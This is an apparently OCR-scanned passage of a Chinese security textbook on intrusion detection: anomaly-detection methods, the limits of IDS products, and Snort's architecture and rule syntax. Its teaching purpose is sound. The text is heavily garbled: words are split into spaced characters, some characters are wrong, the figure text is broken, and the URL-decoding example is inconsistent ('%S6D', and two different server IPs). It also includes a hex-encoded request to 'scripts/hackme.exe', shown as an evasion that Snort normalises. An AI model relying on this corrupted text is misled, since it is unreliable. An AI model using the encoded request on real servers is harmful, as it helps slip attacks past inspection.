5. 异常 检测 方法 的 发 展 


早期 的 基于 主机 的 和 人 侵 检测 系统 以 及 20 世纪 90 年 代 之 后 发 展 起 来 的 基于 网 络 的 入侵 
检测 系统 都 应 用 了 滥用 检测 方法 , 即 首先 对 各 种 人 侵 行 为 进行 分 析 并 归纳 出 一 定 的 入侵 模 
式 , 然 后 将 当前 的 网 络 或 系统 行为 与 这 些 人 侵 模式 进行 匹配 ,如 果 吻 合 则 表示 当前 行为 为 人 
侵 。 这 种 方法 的 优点 是 准确 率 高 ,执行 速度 快 ,但 缺点 也 是 明显 的 , 即 无 法 检测 到 新 型 的 入 
侵 ,这 对 于 安全 要 求 较 高 的 计算 机 系统 及 网 络 而 言 是 不 能 满足 要 求 的 。 因 此 ,人 们 变换 思 
路 ,提出 了 另 一 种 入 侵 检 测 的 方法 , 即 异 常 检 测 方法 。 

入 侵 检 测 的 发 展 过 程 如 图 12-8 所 示 。 


概念 的 诞生 (1980 年 ) 
出 了 利用 审计 跟踪 数据 监视 入 侵 活动 的 思想 


澡 


产生 模型 (80 年 代 中 期 ) 
实时 入 侵 检测 系统 模型 ， 取 名 为 IDES 
(入 侵 检测 专家 系统 ) 


| 


模型 的 发 展 (80 年 代 后 期 一 90 年 代 初 ) 
用 于 检测 单一 主机 的 入 侵 尝 试 。 
采用 滥用 检测 的 方法 (misuse) 


网 络 IDS 产 生 (1990 年 一 现在 ) 从 滥用 检测 方法 到 异常 检测 
监控 网 段 上 的 网 络 流量 ， 方法 的 转变 (90 年 代 初 一 现在 ) 
将 其 作为 分 析 的 主要 数据 源 。 能 检测 出 未 知 入 侵 


和 基于 主机 的 IDS 互 补 
新 一 代 的 智能 IDS( 目 前 ) 


12-8 IDS 技术 的 发 展 
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另外 ,值得 一 提 的 是 ,在 网 络 入 侵 检 测 系统 中 ,有 多 个 著名 的 开放 源 代码 (Open Source) 
软件 ,它们 是 Snort、Shadow、Prelude IDS、Bro 等 ,它们 对 IDS 的 发 展 起 到 了 重要 的 推动 
作用 。 

在 国内 ,目前 对 入 侵 检测 系统 的 研究 也 取得 了 一 定 的 进展 ,有 的 是 在 防火 墙 中 集成 人 侵 
检测 模块 ,有 的 则 形成 了 独立 的 人 侵 检 测 系统 。 但 总 的 来 说 ,这 些 系统 大 多 采用 常规 的 模式 
识别 和 完整 性 检测 技术 ,在 统计 分 析 、 数 据 挖掘 等 项 技术 的 应 用 上 还 缺乏 研究 。 
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入 侵 检 测 在 工业 界 和 学 术 界 有 着 不 同 的 发 展 方向 。 

在 工业 界 ,主要 的 研究 内 容 是 如 何 通过 优化 检测 系统 的 算法 来 提高 人 侵 检测 系统 的 综 
合 性 能 与 处 理 速度 ,以 适应 千 兆 网 络 的 需求 。 

在 学 术 界 ,主要 通过 引入 各 种 软 计算 方法 ,使 人 侵 检测 技术 向 智能 化 方向 发 展 。 例 如 利 
用 数据 挖掘 技术 来 代替 人 工 处 理 数据 的 方式 ,帮助 人 们 从 海量 数据 中 挖掘 出 对 各 类 决策 有 
指导 意义 的 一 般 性 知识 。 另 外 还 有 人 工 神经 网 络 , 人 工 免疫 技术 的 应 用 等 。 这 些 方法 可 以 
说 对 IDS 的 发 展 及 完善 起 了 一 定 的 作用 ,但 是 并 没有 完全 解决 问题 。 下 面 对 这 些 方法 做 一 
个 简单 的 介绍 。 


1. 人 工 神经 网 络 技术 在 入 侵 检 测 中 的 应 用 


人 工 神 经 网 络 (ANN) 在 入 侵 检测 中 的 应 用 大 约 始 于 20 世纪 90 年 代 初 期 , 它 以 自 适 
应 、 自 学 习 、 自 组 织 、 较 好 的 容错 性 和 和 鲁 棒 性 、 并 行 性 ,联想 记忆 和 联想 映射 等 优点 而 受到 了 
世人 瞩目 ,在 人 侵 检 测 领域 发 挥 了 重要 作用 。 

人 工 神经 网 络 在 异常 检测 和 滥用 检测 中 都 有 应 用 ,但 主要 用 于 异常 检测 中 。 

异常 检测 问题 可 以 被 看 做 是 一 个 一 般 的 数据 分 类 问题 ,由 于 基于 统计 的 方法 在 提取 、 抽 
象 审计 实例 时 存在 一 些 问题 ,例如 审计 数据 不 完备 ,必须 依赖 一 些 概率 分 布 假设 ,或 者 要 和 赁 
经 验 和 感觉 来 刻画 用 户 行为 的 度量 。 为 此 引入 人 工 神 经 网 络 ,用 代表 正常 用 户 行为 的 样本 
点 来 训练 神经 网 络 ,通过 反复 多 次 学 习 , 神 经 网 络 能 从 数据 中 提取 正常 的 用 户 或 系统 活动 的 
模式 ,并 编码 到 网 络 结构 中 ,检测 时 ,将 审计 数据 通过 学 习 好 的 神经 网 络 , 即 可 判定 用 户 的 行 
为 是 否 正常 。 

1992 年 Herve 使 用 一 种 再 生 的 神经 网 络 来 学 习 审 计数 据 中 的 时 间 序 列 , 再 生 神 经 网 络 
部 分 输出 被 反馈 为 下 一 部 分 的 输入 ,这 在 神经 网 络 内 部 产生 了 对 过 去 的 记忆 。 神 经 网 络 具 
有 长 时 记忆 ,编码 在 连接 中 存储 行为 的 规律 ,还 具有 短 时 记忆 。 但 记忆 能 力 受 限于 神经 元 的 
个 数 和 连接 个 数 。 

但 是 ,神经 网 络 也 有 其 缺点 ,例如 ,在 很 多 情况 下 ,系统 趋向 于 形成 某 种 不 稳定 的 网 络 结 
构 , 不 能 从 训练 数据 中 学 习 到 特定 的 知识 ,这 种 情况 目前 尚 不 能 完全 确定 产生 的 原因 。 而 
且 , 它 在 训练 过 程 中 ,要 求 有 足够 丰富 的 训练 样本 集 ,而 在 实际 环境 中 ,难以 得 到 (甚至 根本 
不 可 能 得 到 ) 足 够 丰富 的 实测 样本 ,因此 难以 训练 出 有 较 高 识别 率 的 网 络 。 另 外 ,神经 网 络 
对 判断 为 异常 的 事件 不 会 提供 任何 解释 或 说 明 信 息 ,这 导致 了 用 户 无 法 确认 入 侵 的 责任 人 ， 
也 无 法 判定 究竟 是 系统 哪 方面 存在 的 问题 导致 了 攻击 者 得 以 成 功 的 入侵 。 由 于 这 些 缺 点 的 
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存在 ,神经 网 络 在 人 侵 检测 系统 中 的 应 用 近年 来 一 直 没 有 得 到 突破 性 进展 。 
2. 人 工 免疫 技术 在 入 侵 检测 中 的 应 用 


由 生物 引发 的 信息 处 理 技术 包括 人 工 神经 网 络 、 进 化 计算 和 人 工 免 疫 系统 。 人 工 免疫 
系统 受到 生物 免疫 系统 的 启发 ,发 展 了 一 套 基于 自然 防御 机 理 的 学 习 技 术 。 生 物 免 疫 系 统 
担当 着 与 人 侵 检 测 系统 相 类 似 的 作用 ,前 者 保护 身体 免 受 病毒 的 侵害 而 后 者 防止 计算 机 遭 
到 病毒 .人 侵 的 攻击 。 所 以 将 人 工 免疫 技术 的 一 些 机 理应 用 到 入 侵 检测 中 是 很 正常 的 。 

处 于 网 络 环境 中 的 主机 之 所 以 受到 入 侵 ,是 因为 主机 系统 本 身 以 及 所 运行 的 应 用 程序 
存在 着 各 种 脆弱 性 因素 ,网 络 攻击 者 正 是 利用 这 些 漏洞 来 侵入 到 主机 系统 中 的 。 生 物体 拥 
有 免疫 系统 来 负责 检测 和 抵御 入 侵 , 免 疫 机 制 包 括 特 异性 免疫 和 非特 异性 免疫 。 特 异性 免 
疫 针 对 特定 的 某 种 病毒 ,非特 异性 免疫 可 用 于 检测 和 抵制 以 前 从 未 见 过 的 入侵 类 型 。 

最 早 将 人 工 免疫 的 一 些 思想 引入 入 侵 检 测 系统 的 是 Forrest, 为 人 侵 检测 提供 了 以 下 思 
路 , 即 通过 对 正常 行为 的 学 习 来 识别 不 符合 常态 的 行为 序列 。 

当 系 统 的 一 个 关键 程序 投入 使 用 后 , 它 的 运行 情况 一 般 变化 不 大 ,与 系统 用 户 行为 的 易 
变性 相 比 ,具有 相对 的 稳定 性 。 因 而 ,可 以 利用 系统 进程 正常 执行 轨迹 中 的 系统 调用 短 序列 
集 , 来 构建 系统 进程 正常 执行 活动 的 特征 轮廓 。 由 于 在 利用 这 些 关 键 程序 的 缺陷 进行 攻击 
时 ,对 应 的 进程 必然 执行 一 些 不 同 于 正常 执行 时 的 代码 分 支 ,因而 就 会 出 现 关键 程序 特征 轮 
廓 中 没有 的 系统 调用 短 序 列 。 当 检测 到 特征 轮廓 中 不 存在 的 系统 调用 序列 的 量 达 到 某 一 条 
件 时 ,就 认为 被 监控 的 进程 正 企图 攻击 系统 。 

但 是 ,应 用 免疫 技术 ,我们 必须 获得 程序 运行 的 所 有 情况 的 执行 轨迹 ,这 样 才能 使 得 到 
的 程序 特征 轮廓 很 好 的 刻画 程序 的 特征 ,从 而 具有 很 低 的 误 警 率 。 但 是 ,要 达到 这 个 要 求 还 
有 一 定 的 难度 。 另 外 ,用 这 种 方法 检测 不 出 那些 能 够 利用 程序 合法 活动 获取 非 授权 存 取 的 
攻击 。 这 项 技术 还 需要 进一步 的 研究 。 


3. 数据 挖掘 技术 在 入 侵 检 测 中 的 应 用 


数据 挖掘 是 从 存放 在 数据 库 数据 仓库 或 其 他 信息 库 中 的 大 量 数据 中 挖掘 所 需 知识 的 
过 程 ,通常 被 视 为 知识 发 现 的 一 个 基本 步骤 。 

1995 年 ,在 加 拿 大 召开 第 一 届 知 识 发 现 和 数据 挖掘 国际 学 术 会 议 后 ,数据 挖掘 开始 流 
行 。 它 是 知识 发 现 概念 的 深化 ,是 人 工 智能 、 机 器 学 习 与 数据 库 相 结合 的 产物 。 它 是 一 项 通 
用 的 技术 ,其 本 身 的 技术 含量 完全 体现 在 算法 上 。 

将 数据 挖掘 技术 应 用 于 入 侵 检测 中 ,目的 在 于 对 海量 的 安全 审计 数据 进行 智能 化 的 处 
理 , 提 取出 入 侵 检 测 感 兴趣 的 内 容 。 目 前 主要 有 两 个 方向 : 一 是 发 现 人 侵 的 规则 、 模 式 , 与 
模式 匹配 检测 方法 相 结 合 ; 二 是 用 于 异常 检测 , 找 出 用 户 的 正常 行为 ,创建 用 户 的 正常 行 
为 库 。 

在 这 个 研究 方向 上 ,比较 有 代表 性 的 是 美国 哥伦比亚 大 学 入侵 检测 研究 小 组 提出 的 基 
于 数据 挖掘 的 实时 和 人 侵 检测 技术 。 其 主要 思想 是 提取 描述 网 络 连接 和 主机 会 话 的 特征 值 ， 
用 数据 挖掘 程序 产生 某 些 规则 ,利用 它 能 准确 捕捉 到 入 侵 模式 或 正常 活动 轮廓 。 这 些 规则 
以 后 可 以 用 于 滥用 检测 和 异常 检测 。 这 种 方法 使 人 们 无 须 用 手工 分 析 和 编码 入 侵 行为 ,使 
入 侵 检测 系统 的 更 新 和 扩展 变 得 简单 易 行 ,也 避免 了 早期 基于 统计 异常 检测 那样 猜测 性 的 
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选择 在 建立 正常 使 用 轮廓 时 所 需要 的 统计 度量 。 他 们 给 出 了 特别 适用 于 挖掘 审计 数据 的 算 
法 : 分 类 算法 .关联 分 析 和 序列 分 析 。 

在 实验 部 分 ,他 们 用 使 用 RIPPER 分 类 算法 研究 了 系统 调用 数据 的 采样 ,用 一 个 较 小 
的 规则 集合 来 描述 正常 数据 的 模式 特征 ,在 监控 时 ,违反 这 些 特征 的 序列 被 视 为 异常 。 
RIPPER 是 一 个 规则 学 习 系 统 , 主 要 用 于 分 类 问题 ,给 定 足 够 的 样本 , 它 能 够 自动 提取 样本 
中 蕴涵 的 规则 。 

从 他 们 的 实验 和 测试 表明 ,将 数据 挖掘 技术 应 用 于 入 侵 检 测 在 理论 上 是 可 行 的 ,在 技术 
上 建立 这 样 一 套 系统 是 可 能 的 。 

国际 上 在 这 个 方向 的 研究 很 活跃 ,多数 得 到 了 美国 国防 部 高 级 研究 计划 署 .国家 自然 科 
学 基金 (NSF) 的 支持 。 
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IDS 是 一 种 很 好 的 安全 防护 手段 ,但 它 绝 不 是 尽善尽美 的 , 它 也 有 很 多 自身 的 限制 。 在 
实时 监视 网 络 活动 时 ,可 能 会 有 一 些 情况 虽 已 发 现 , 但 是 采取 措施 却 为 时 已 晚 。 

IDS 有 如 此 重大 的 作用 ,但 在 国内 的 应 用 远 远 谈 不 到 普及 ,这 一 方面 是 由 于 用 户 的 认 知 
程度 较 低 , 另 一 方面 是 由 于 入 侵 检 测 是 一 门 比较 新 的 技术 ,还 存在 一 些 技 术 上 的 困难 ,不 是 
所 有 厂商 都 有 研发 人 侵 检 测 产 品 的 实力 。 目 前 的 入 侵 检 测 产 品 还 存在 着 一 些 非常 现实 的 
矛盾 。 


1. 误 报 和 漏 报 的 矛盾 


入 侵 检测 系统 对 网 络 上 所 有 的 数据 进行 分 析 , 如 果 攻 击 者 对 系统 进行 攻击 尝试 ,而 系统 
相应 服务 开放 ,只 是 漏洞 已 经 修补 ,那么 ,这 一 次 攻击 是 否 需 要 报警 ,就 是 一 个 需要 管理 员 判 
断 的 问题 。 因 为 这 也 代表 了 一 种 攻击 的 企图 。 但 大 量 的 报警 事件 会 分 散 管理 员 的 精力 , 反 
而 无 法 对 真正 的 攻击 做 出 反应 。 和 误 报 相对 应 的 是 漏 报 , 随 着 攻击 的 方法 不 断 更 新 ,入 侵 检 
测 系统 是 否 能 报 出 网 络 中 所 有 的 攻击 也 是 一 个 问题 。 


2. 隐私 和 安全 的 矛盾 


入 侵 检测 系统 可 以 收 到 网 络 的 所 有 数据 ,同时 可 以 对 其 进行 分 析 和 记录 ,这 对 网 络 安全 
极其 重要 ,但 难免 对 用 户 的 隐私 构成 一 定 威胁 ,这 就 要 看 具体 的 人 侵 检 测 产品 是 否 能 提供 相 
应 功能 ,以 供 管理 员 进 行 取舍 。 


3. 被 动 分 析 与 主动 发 现 的 矛盾 


入 侵 检测 系统 是 采取 被 动 监 听 的 方式 发 现 网 络 问题 ,无 法 主动 发 现 网 络 中 的 安全 隐患 
和 故障 。 如 何 解决 这 个 问题 也 是 入 侵 检测 产品 面临 的 难题 。 


4. 海量 信息 与 分 析 代 价 的 矛盾 


随 着 网 络 数据 流量 的 不 断 增 长 ,入 侵 检测 产品 能 和 否 高 效 处 理 网 络 中 的 数据 也 是 衡量 入 
侵 检 测 产品 的 重要 依据 。 
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5. 功能 性 和 可 管理 性 的 矛盾 


随 着 入 侵 检测 产品 功能 的 增加 ,能 否 在 功能 增加 的 同时 ,不 增 大 管理 的 难度 ? 例如 ,入 
侵 检 测 系统 的 所 有 信息 都 储存 在 数据 库 中 ,此 数据 库 能 否 自动 维护 和 备份 而 不 需 管理 员 的 
干预 ? 另外 ,入 侵 检 测 系统 自身 安全 性 如 何 ? 是 否 易于 部 署 ? 采用 何 种 报警 方式 ? 这 些 也 
都 是 需要 考虑 的 因素 。 


6. 单一 产品 与 复杂 网 络 应 用 的 矛盾 


入 侵 检测 产品 最 初 的 目的 是 为 了 检测 网 络 的 攻击 。 但 仅仅 检测 网 络 中 的 攻击 远 远 无 法 
满足 目前 复杂 的 网 络 应 用 需求 。 通 常 , 管 理 员 难 以 分 清 网 络 问题 : 是 由 于 攻击 引起 还 是 网 
络 故 障 引 起 ?入侵 检测 检测 出 的 攻击 事件 又 如 何 处 理 , 可 否 和 目前 网 络 中 的 其 他 安全 产品 
进行 配合 等 。 


126 网 络 入 侵 检 测 系 统 Snort 


早 在 1998 年 ,Martin Roesch 开发 了 开放 源 代 码 的 入 侵 检测 系统 Snort。 直 至 今天 ， 
Snort 已 发 展 成 为 一 个 多 平台 的 强大 的 网 络 人 侵 检测 系统 。 

Snort 可 以 完成 数据 包 嗅 探 , 数 据 包 记 录 、 入 侵 检 测 .实时 发 送 报警 信息 。Snort 常 被 称 
为 轻 量 级 的 入侵 检 测 系统 ,这 里 * 轻 量 级 ”的 意思 是 占用 的 资源 非常 少 ,能 运行 在 不 同 的 操作 
系统 上 ,另外 , 它 还 能 提供 一 些 以 前 只 有 商业 NIDS 才能 提供 的 功能 。 所 以 ,目前 Snort 是 
最 流行 的 免费 NIDS。 

当然 , 它 的 流行 还 得 益 于 日 渐 流 行 的 Linux 和 其 他 的 免费 操作 系统 ,例如 BSD 系列 的 
NetBSD .OpenBSD 和 FreeBSD 等 ,早期 开发 的 Snort 是 在 这 些 操 作 系统 上 运行 。 现 在 , 它 
拥有 可 以 运行 在 Solaris\HP-UX IRIX 甚至 Windows 上 的 版 本 。 

Snort 是 基于 滥用 检测 的 IDS, 使 用 规则 的 定义 来 检查 网 络 中 的 问题 数据 包 。 一 个 规则 
被 触发 后 会 产生 一 条 报警 信息 。 例 如 ,可 以 定义 一 条 检查 是 否 有 端 到 端 P2P 文件 共享 服务 
的 规则 ,规则 内 容 为 检查 连接 到 非 80 端口 服务 的 数据 是 否 有 GET 字符 串 。 如 果 有 数据 包 
匹配 这 条 规则 ,就 会 产生 报警 信息 。 这 条 报警 信息 可 以 根据 配置 不 同 保存 至 多 个 地 方 , 例 如 
日 志文 件 数据库、 或 者 SNMP 的 trap 命令 等 。 

Snort 最 初 的 开发 目的 是 做 一 个 嗅 探 器 Sniffer。1998 年 11 月 , Marty Roesch 写 了 一 
个 Linux 平 台 下 的 数据 包 嗅 探 器 ,起 名 叫 APE。 后 来 ,他 又 在 其 中 加 入 了 些 其 他 的 功能 : 使 
用 十 六 进 制 输出 格式 记录 数据 包 、 使 用 统一 的 方式 显示 不 同 网 络 中 的 数据 包 等 。 

1998 年 12 月 , Snort 程序 被 放 到 Packet Storm 网 站 上 供 人 下 载 。1999 年 1 月 ,在 
Snort 中 加 入 了 基于 特征 分 析 的 功能 。 这 时 Snort 开始 向 和 人 侵 检测 靠拢 。1999 年 10 月 
Snort 1.5 版 发 布 。 其 软件 体系 结构 一 直 沿 用 下 来 ,直到 Snort 2. 0 版 ,Marty Roesch 才 对 
软件 体系 结构 做 了 重大 变革 。 从 早期 的 1600 行 代码 增加 到 了 75 000 行 。 

随 着 Snort 的 流行 ,Snort 的 规则 格式 渐渐 成 为 标准 。 在 本 书 中 ,我 们 采用 了 Windows 
下 的 Snort 版 本 来 进行 研究 。 

Snort 由 以 下 几 个 部 分 组 成 : 数据 包 嗅 探 器 、 预 处 理 器 检测 引擎 、 报 警 输 出 模块 ,如 
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图 12-9 所 示 。 
Snort 的 基本 功能 是 数据 包 嗅 探 器 。 在 获取 数据 包 后 , 先 用 预 处 理 插件 处 理 , 然 后 经 过 
检测 引擎 中 所 有 的 规则 链 , 符 合 规则 的 数据 包 被 检测 出 来 。 


网 络 噢 | 预 处 | 检测 | 报警/ 日 志 
络 | 理 器 | 引 学 | 日 交 所 6 


图 12-9 Snort 的 基本 组 成 


首先 利用 嗅 探 器 在 网 络 中 获取 数据 包 , 然 后 通过 预 处 理 插件 对 数据 包 进行 初步 的 处 理 ， 
例如 格式 处 理 、 基 本 分 类 。 接 着 按照 规则 判断 这 些 数据 包 是 否 引入 安全 问题 ,如 果 有 , 则 确 
定 如 何 处 理 这 些 数据 包 ( 报 警 或 者 保存 到 日 志 ) 。 

它 的 预 处 理 器 检测 引擎 和 报警 模块 都 是 以 插件 的 形式 存在 ,插件 程序 按照 Snort 提供 
的 插件 函数 接口 完成 ,使 用 时 动态 加 载 ,在 不 用 修改 核心 代码 的 前 提 下 让 Snort 的 功能 和 复 
杂 性 扩展 更 加 容易 。 既 保证 了 插件 程序 和 Snort 核心 代码 的 紧密 相关 性 ,又 保证 了 核心 代 
码 的 良好 扩展 性 。 


126.1 数据 包 嗅 探 器 


嗅 探 功 能 和 电话 窃听 比较 相似 。 不 同 的 是 电话 穷 听 的 是 语音 网 络 而 数据 包 窃 听 的 是 数 
据 包 。 在 互联 网 上 通常 指 嗅 探 IP 网 络 的 流量 。 

在 IP 数据 包 里 包含 了 不 同类 型 的 协议 ,如 TCP.UDP、ICMP、IPSec 和 路 由 协议 等 , 因 
此 很 多 数据 包 嗅 探 器 还 能 够 做 协议 分 析 ,并 且 把 分 析 结 果 展 现 出 来 。 

数据 包 嗅 探 器 能 够 进行 网 络 分 析 和 故障 查找 ,进行 网 络 性 能 和 负荷 量 分 析 , 监 听 明 文 传 
送 的 敏感 数据 。 

例如 在 本 书 第 15 章 实验 中 提 到 的 Ethereal 就 是 一 个 很 典型 的 嗅 探 器 ,能够 完成 以 上 介 
绍 的 所 有 功能 。 

嗅 探 器 不 等 于 入 侵 检 测 系统 ,IDS 必须 还 有 检测 数据 包 是 否 合法 .是 否 会 带 来 安全 问题 
的 能 力 。 但 是 嗅 探 器 是 IDS 的 基础 ,是 它 的 重要 组 成 部 分 。Snort 它 可 以 很 好 地 完成 数据 
嗅 探 的 工作 ,但 是 它 的 价值 远 远 不 止 这 些 , 它 是 一 个 能 够 实时 监测 网 络 安全 的 有 力 工 具 。 

Snort 是 将 机 器 的 网 卡 运行 在 “混杂 ”模式 ,然后 利用 Libpcap(Windows 操作 系统 下 使 
用 的 Winpcap) 从 网 卡 捕获 数据 包 。 数 据 包 经 过 解码 引擎 填 入 到 数据 链 路 层 协议 的 包 结 构 
体 中 ,以 便 对 高 层次 的 协议 进行 解码 。 所 以 在 安装 Snort 之 前 必须 安装 Libpcap 库 。 

混杂 模式 : 网 卡 默认 方式 是 忽略 所 有 不 是 以 自己 的 MAC 地 址 为 目的 地 址 的 帧 。 网 卡 
还 有 另外 一 种 工作 方式 , 即 混杂 模式 ,采用 这 种 模式 时 ,网 卡 不 检查 目的 MAC 地 址 ,而 可 以 
监听 网 络 中 所 有 的 数据 包 。 
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Libpcap 库 允许 开发 人 员 在 不 同 的 UNIX 平台 上 从 数据 链 路 层 接收 数据 包 , 而 不 必 考 
虑 网 卡 以 及 驱动 程序 的 不 同 。 更 重要 的 是 Libpcap 库 直 接 从 网 卡 取 得 数据 包 , 它 允许 开发 
人 员 自 己 写 程序 代码 .显示 和 记录 数据 报 文 。 

在 Snort, c 源 代 码 中 ,实现 Snort 启动 的 时 候 进 行 一 系列 的 设置 和 配置 。 在 检查 接口 
和 设置 网 卡 进入 混杂 模式 之 后 ,Snort 调用 Libpcap 库 ,进入 主 执行 循环 ,或 者 叫做 pcap 循 
环 ,使 用 了 Libpcap 就 不 需要 重新 解码 和 抓 包 程序 ,开发 嗅 探 器 就 变 得 很 容易 了 。 最 初 的 
Libpcap 是 基于 UNIX 系统 的 。 意 大 利 的 一 个 研发 组 织 编写 了 Windows 版 本 的 Winpcap， 
可 以 被 基于 Windows 平台 的 嗅 探 器 使 用 ,例如 Snort 的 Windows 平台 版 本 和 Ethereal 的 


Windows 版 本 。 
图 12-10 描述 了 Snort 在 网 络 中 的 应 用 。 
客户 平台 客户 平台 


= 


EE y : PC2 

主机 名 : PCI1 主机 名 : PC Linux 服 务 器 

IP: 10.1.1.10 IP: 10.1.1.236 ei 
MAC : 00-10-A4-A2-09-66 cc MAC : 00-10-A4-A2-09-77 EE NSD 


IP: 10.1.1.220 
MAC : 00-10-A4-A2-09-88 


集线器 


Windows 服 务 器 
主机 名 ， Windows Server 


主机 名 : Snort IP: 10.1.1.251 
IP: 10.1.1.254 MAC : 00-10-A4-A2-09-99 


MAC : 00-10-A4-A2-09-01 


Snort IDS 
图 12-10 ”Snort 在 网 络 中 的 应 用 


在 这 个 网 络 中 ,客户 平台 、Linux 服务 器 和 Windows 服务 器 以 及 一 台 安装 了 Snort 的 主 
机 用 集线器 连接 在 一 起 ,集线器 是 共享 设备 ,因此 所 有 的 流量 将 被 连接 在 集线器 的 每 个 端口 
上 。Snort 的 主机 网 卡 使 用 了 “混杂 ”模式 ,能够 获取 所 有 通过 集线器 的 数据 包 。 例 如 pcl 访 
问 Linux 服务 器 所 发 送 的 数据 包 、 服 务 器 和 客户 平台 通信 的 数据 包 等 。 

但 是 假如 把 这 个 集线器 换 成 交换 机 ,在 交换 环境 下 ,交换 机 能 够 知道 什么 端口 有 什么 样 
的 MAC 地 址 ,并 且 只 发 送 网 络 流量 到 相应 的 端口 。 那 么 即使 Snort 网 卡 工作 在 混杂 模式 ， 
也 依然 监听 不 到 其 他 端口 的 流量 。 不 过 现在 交换 机 基本 上 有 镜像 和 监听 的 机 制 , 通 过 复制 
流量 到 特定 端口 来 实现 监听 。 当 我 们 将 Snort 服务 器 连接 到 这 个 端口 上 就 可 以 监听 所 有 通 
过 这 个 交换 机 的 流量 了 。 


1262 预 处 理 器 
基于 特征 规则 匹配 的 IDS 因为 速度 快 而 受 欢迎 。 如 果 只 是 对 每 个 包 进 行 数 字 和 字符 


串 的 匹配 ,处 理性 能 就 能 适应 快速 的 高 负荷 网 络 。 正 如 在 讲述 检测 方法 分 类 的 时 候 说 过 , 基 
于 特征 的 匹配 容易 产生 漏 报 , 原 因 是 特征 语言 的 表达 能 力 有 限 或 者 IDS 对 协议 分 析 不 够 。 
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一 些 IDS 通过 复杂 的 方法 来 解决 这 个 问题 。 例 如 采用 异常 检测 的 方法 。 在 Snort 中 ,采用 
预 处 理 的 方法 来 完成 这 些 功 能 , 它 超越 了 基于 规则 匹配 的 检测 机 制 。 

它 的 主要 思想 是 在 数据 包 送 到 Snort 主 检测 引擎 之 前 提供 一 个 丢弃 数据 包 、 修 改 数据 
包 的 框架 。 

例如 ,图 12-10 中 ,台式 机 PC2 需要 连接 Windows Web 服务 器 ,用 户 通 过 浏览 器 输入 
下 面 的 字符 串 ， 


http://10.1.1.251/%73%63%72%69%70%74%73%68%61%63%6B%S6D%65. %65%78%65 


HTTP 协议 允许 使 用 %XX 符号 表示 的 通用 资源 标识 符 (URI) 来 表示 内 容 , 其 中 XX 
是 字符 的 十 六 进 制 值 。 当 URI 到达 Web 服务 器 , 它 被 转换 成 http://10. 1. 1. 252/scripts/ 
hackme. exe。 

Snort 在 收 到 这 个 字符 串 后 ,在 送 到 检测 引擎 之 前 先 将 其 规格 化 , Http 解码 CHTTP_ 
decode) 预 处 理 器 会 将 其 转换 为 标准 格式 ,来 节约 检测 引擎 的 资源 。 除 了 HTTP 解码 预 处 
理 之 外 ,还 有 telnet_decode 预 处 理 器 .ftp_decode 预 处 理 器 .rpc_decode 预 处 理 器 等 。 

预 处 理 器 为 模块 化 的 插件 ,可 以 根据 需要 来 选择 。 例 如 采用 RPC 插件 和 端口 扫描 插件 
检查 原始 的 数据 包 。 在 遵循 Snort 规则 的 前 提 下 ,用 户 甚至 可 以 建立 自己 的 预 处 理 器 。 


1263 检测 引 警 和 规则 集 


检测 引擎 是 Snort 的 核心 模块 。 当 数据 包 从 预 处 理 器 送 过 来 后 ,检测 引擎 依据 预先 设 
置 的 规则 检查 数据 包 , 一 旦 发 现 数据 包 中 的 内 容 和 某 条 
规则 相 匹 配 ,就 通知 报警 模块 ,如 图 12-11 所 示 。 

Snort 作为 基于 特征 的 IDS, 它 的 功能 实现 依赖 于 1 
各 种 不 同 的 规则 设置 ,检测 引擎 依据 规则 来 匹配 数据 规则 库 
包 。Snort 的 规则 很 多 ,并 根据 不 同 的 类 型 (木马 缓冲 | 
区 溢出 、 滥 用 权限 ) 做 了 分 组 。 


检测 引擎 


规则 由 规则 头 和 规则 体 组 成 ,如 图 12-12 所 示 。 妥 据 包 开 本 > “是 _- | 日 志 或 报警 
规则 头 : 规则 头 描述 了 本 条 规则 的 处 理 动作 (记录 

或 者 报警 ) ,数据 包 的 协议 类 型 (TCP、UDP、ICMP 等 )， 

源 信息 ( 源 地 址 , 源 端口 ), 目的 信息 (目的 地 址 ,目的 一 

端口 ) 。 图 12-11 Snort 的 检测 流程 


加 规则 行为 | 协议 类 型 | 源 信 息 | 目的 信息 
规则 体 


图 12-12 规则 的 构成 


规则 体 : 规则 体 中 的 各 项 描述 这 条 规则 要 检测 数据 包 中 的 内 容 。 
例如 : 


alert tcp any any — > any 12345 (msg:" Test Message"; nocase;) 
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这 个 规则 中 ,开头 部 分 为 规则 头 , 规 则 行为 为 alert, 表 示 报 警 ; 协议 为 TCP, 源 地 址 和 
端口 为 any, 也 就 是 任何 地 址 任何 端口 ; 目的 地 址 为 any, 目 的 端口 为 12345。 括 号 内 的 为 
规则 体 ,第 一 部 分 是 规则 触发 后 将 显示 的 信息 ; 第 二 部 分 是 nocase 选项 ,说 明 本 规则 检查 
数据 包 内 容 时 不 区 分 大 小 写 

检测 引擎 和 规则 集 是 Snort 系统 学 习 和 理解 中 的 难点 。Snort 的 规则 有 自己 独特 的 语 
法 ,涵盖 了 对 协议 类 型 .数据 包 的 数据 段 内 容 、 数 据 包 长 度 . 包 头 内 容 等 多 方面 的 描述 。 规 则 
语法 还 能 定义 异常 情况 ,这 在 检测 缓冲 区 溢出 中 非常 有 用 。 

如 果 我 们 使 用 Snort 并 且 学 习 了 如 何 写 Snort 的 规则 ,就 可 以 根据 自己 的 网 络 环境 和 
需求 定制 规则 集 ,使 Snort 更 好 的 工作 。 


1264 报警 .日 志 模块 


经 检测 引擎 检查 后 的 Snort 数据 需要 以 某 种 方式 输出 。 如 果 检 测 引擎 中 的 某 条 规则 被 
匹配 , 则 会 触发 一 条 报警 ,这 条 报警 信息 会 通过 网 络 送 给 日 志文 件 , 也 可 以 记 入 SQL 数 
据 库 。 

另外 ,还 有 专门 为 Snort 开发 的 辅助 工具 ,如 各 种 各 样 基于 Web 的 报警 信息 显示 插件 。 
一 般 用 Perl 或 者 PHP 开发 ,目的 是 为 了 更 加 直观 显示 报警 信息 。 与 预 处 理 器 和 检测 引擎 
模块 一 样 ,报警 输出 模块 也 使 用 插件 实现 多 种 输出 功能 ,如 把 报警 信息 送 入 数据 库 或 通过 
SNMP,WinPopup 等 网 络 协议 传送 。 常 用 的 插件 有 : ACID、IDSCenter、Swatch 等 。 

图 12-13 是 一 个 使 用 ACID 插件 通过 浏览 器 了 解 报警 和 统计 信息 的 界面 。 


Analysis Console for Intrusion Databases 


Added D alert(s) io the Alert cache 


Queried on : Fr December 22, 2006 16.50:24 
Database: snor_aleri@localhost schema version: 0) 
Time window: [2006-12.22 16.18.22] - [2006-12.22 16; 外 16] 


Sensors: 1 Traffic Profile by Protocol 
Unique Alerts: 12 TCR 
Total Number of Alerts: B6 
